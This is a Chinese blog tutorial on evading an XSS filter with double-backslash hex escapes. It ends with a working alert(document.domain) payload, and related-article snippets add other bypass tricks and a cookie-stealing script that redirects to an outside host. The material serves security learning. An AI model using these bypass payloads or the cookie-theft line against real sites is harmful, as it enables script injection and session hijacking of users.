16进制绕过过滤触发XSS

最新推荐文章于 2022-08-17 17:35:50 发布
最新推荐文章于 2022-08-17 17:35:50 发布
阅读量624 收藏 2
点赞数 2
分类专栏: web安全 文章标签: 字符串 正则表达式 unicode printf gson
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46370858/article/details/114991262
版权

1. 16进制介绍
十六进制转换有16进制每一位上可以是从小到大为0、1、2、3、4、5、6、7、8、9、A、B、C、D、E、F16个大小不同的数,即逢16进1,其中用A,B,C,D,E,F(字母不区分大小写)这六个字母来分别表示10,11,12,13,14,15。
使用python将字符转换为16进制类型。在这里插入图片描述

2. XSS挖掘

构造无害独一字符串,在响应在寻找该字符串。在这里插入图片描述

  1. 双斜杠+16进制绕过
    在这里插入图片描述

  2. Payload触发XSS

Payload: \\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

在这里插入图片描述

一米八多的瑞兹
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
[ 常见漏洞篇 ]常见web漏洞总结------XSS绕过方式
qq_51577576的博客
12-06 3303
本文具体写到了常见的XSS绕过方式,间的的介绍了一下修复方式 写的比较细,比较深,需要一定的基础才能看懂,仔细读完 不懂的可以百度查一查或者私信我,相信会有很大收获 目录 一、Xss绕过方式: 1. 前端过滤 2.双写绕过 3. 事件绕过 4. 大小写绕过 5. 注释干扰绕过 6.伪协议绕过 7.空格回车Tab绕过 8. 编码绕过 1. base64编码: 2. JS编码: 3. 十六进制: 4. unicode: 5. HTML实体编码: 6. URL...
XSS篇——XSS过滤绕过技巧
weixin_50464560的博客
05-07 3458
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 改变大小写 在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则: 比如:<script>alert(“xss”);</script>可以...
XSS绕过总结
qq_42990434的博客
05-29 7753
有时候明明有一个xss漏洞,但是却有xss过滤规则或者WAF保护导致我们不能成功的利用,这些会屏蔽掉我们的代码,会导致我们执行完代码之后什么反应都没有,这时候我们可以审查一下元素,看看我们的代码有没有替换为空,或者替换成其他东西,或者那些符号被过滤掉了。 比如:我们输入<script> alert(“hi”) </scrip>, 会被转换成<script> alert(>xss detected<) </scrip>,这样的话我们的js语句就不生效
XSS漏洞介绍及绕过技术
热门推荐
星落的博客
05-30 1万+
跨站脚本攻击(Cross Site Scriptong),为了不和层叠样式表(Cascading Style Sheels)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面插入恶意Script代码,当用户浏览该页时,嵌入期中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 反射型XSS 存储型XSS DOM型XSS xss盗取cookie 代码 <script>document.location=http://ip/cookie.php?coo..
XSS与字符编码及浏览器解析原理
BerL1n
12-29 1365
time: 2019-05-12 21:27 XSS与字符编码基本介绍: 提起XSS 想到的就是插入字符字符编码与各种解析了!现在介绍一下在xss中最经常用到的编码 html实体编码(10进制与16进制): 如把尖括号编码[ < ] -----> html十进制: < html十六进制:&#x3 c; javascript的八进制跟十六进制: 如把尖括号编码[ < ] -----> js八进制: \74 js十六进制: \x3c jsunicode编码:
第十六节 unicode绕过过滤触发XSS-01
最新发布
09-15
第十六节 unicode绕过过滤触发XSS-01
Springboot配置XSS过滤XssFilter.zip
12-31
直接可以运行,包含测试类,对HTML和SQL进行过滤,方便扩展。并且可以配置不拦截的路径,包含注释,方便学习。 博客地址:https://blog.csdn.net/u011974797/article/details/121792680
第十节 绕过过滤domain为空的XSS-01
09-15
第十节 绕过过滤domain为空的XSS-01
XSS绕过技术
10-11
Cross-Site Scripting(XSS绕过技术,来自论坛:法克论坛,作者:bystand
JSP使用过滤器防止Xss漏洞
10-17
主要为大家详细介绍了JSP使用过滤器防止Xss漏洞,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
XSS-Codec XSS代码转换工具
01-14
XSS代码转换工具,用于XSS代码的转换
XSS 漏洞绕过
白菜执笔人的博客
03-04 2322
Web安全攻防 学习笔记 一、XSS 漏洞 1.1、跳过 Stage #9 在 span 标签中添加 onclick= "alert(document.domain)" (其他关卡也可以这样跳过) 1.2、domain 过滤绕过 首先还是构造特殊无害字符串,响应中寻找字符串观察闭合格式。 双写绕过 "><script>alert(document.dodomain...
xss漏洞之进制转换
:)
07-18 445
SQL注入的事件已经是上个世纪最令人头疼的攻击方法,21世纪又出现了HTML注入漏洞,随着web飞速的发展,XSS漏洞已经不容忽视,简单介绍一下XSS漏洞, 只要有用户输入的地方,就会出现XSS漏洞,例如在发表一篇帖子的时候,在其中加入脚本。   1.HTML标签注入:     &lt;script&gt;alert('Hello World!')&lt;/script&gt;   ...
深入讲解XSS利用编码绕过的原理
<XiaoHai>的博客
08-17 1813
xss
SQL注入常见绕过技巧
m0_53065491的博客
01-04 2848
引号绕过 一、16进制绕过 会使用到引号的地方是在于最后的where子句中。如下面的一条sql语句,这条语句就是一个简单的用来查选得到users表中所有字段的一条语句。 select column_name from information_schema.tables where table_name="users" 这个时候如果引号被过滤了,那么上面的where子句就无法使用了。那么遇到这样的问题就要使用十六进制来处理这个问题了。 users的十六进制的字符串是7573657273。那么最后的sql语
mysql 16进制 绕过_SQL注入WAF绕过
weixin_31796803的博客
02-01 773
SQL注入WAF绕过(1)大小写绕过此类绕过不经常使用,但是用的时候也不能忘了它,他原理是基于SQL语句不分大小写的,但过滤过滤其中一种。(2)替换关键字这种情况下大小写转化无法绕过而且正则表达式会替换或删除select、union这些关键字如果只匹配一次就很容易绕过http://www.xx.com/index.php?page_id=-15 UNIunionON SELselectECT 1...
【安全】P 4-18 16进制绕过过滤触发XSS
Z_David_Z的博客
02-20 154
目录0x01 16进制介绍0x02 XSS挖掘0x03 双斜杠+16进制绕过0x04 Payload触发XSS 0x01 16进制介绍 十六进制转换有16进制每一位上可以是从小到大为0、1、2、3、4、5、6、7、8、9、A、B、C、D、E、F16个大小不同的数,即逢16进1,其中用A,B,C,D,E,F(字母不区分大小写)这六个字母来分别表示10,11,12,13,14,15。 使用python将字符转换为16进制类型。 0x02 XSS挖掘 构造无害独一字符串,在响应在寻找该字符串。 0x03 双斜
mysql 16进制 绕过_注入绕过技巧
weixin_39846361的博客
01-20 2695
1.绕过空格(注释符/* */,%a0):两个空格代替一个空格,用Tab代替空格,%a0=空格:%20%09%0a %0b %0c %0d %a0/**/最基本的绕过方法,用注释替换空格:/*注释*/2.括号绕过空格:如果空格被过滤,括号没有被过滤,可以用括号绕过。在MySQL中,括号是用来包围子查询的。因此,任何可以计算出结果的语句,都可以用括号包围起来。而括号的两端,可以没有多余的空格。例如:...
xss 空格过滤绕过
07-27
XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过在网页中注入恶意脚本来获取用户的敏感信息或执行恶意操作。为了防止XSS攻击,通常会对用户输入的内容进行过滤和转义处理。 在绕过空格过滤的情况下,攻击者可以尝试以下方法绕过安全措施: 1. 使用HTML实体编码:攻击者可以使用HTML实体编码来绕过空格过滤。例如,将空格字符替换为其对应的HTML实体编码(例如,将空格替换为` `或` `)。 2. 使用特殊字符:攻击者可以使用特殊字符来绕过空格过滤。例如,使用不可见字符、全角空格或其他类似的字符。 3. 绕过过滤器规则:攻击者可以尝试绕过已实施的过滤器规则。这可能需要对输入进行深入了解,并找到规则中的漏洞或限制。 重要的是要意识到,绕过空格过滤只是XSS攻击的一种方式,还有其他许多方法可以进行XSS攻击。为了保护网站免受XSS攻击,建议采取综合的安全措施,包括输入验证、输出编码、内容安全策略等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一米八多的瑞兹

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值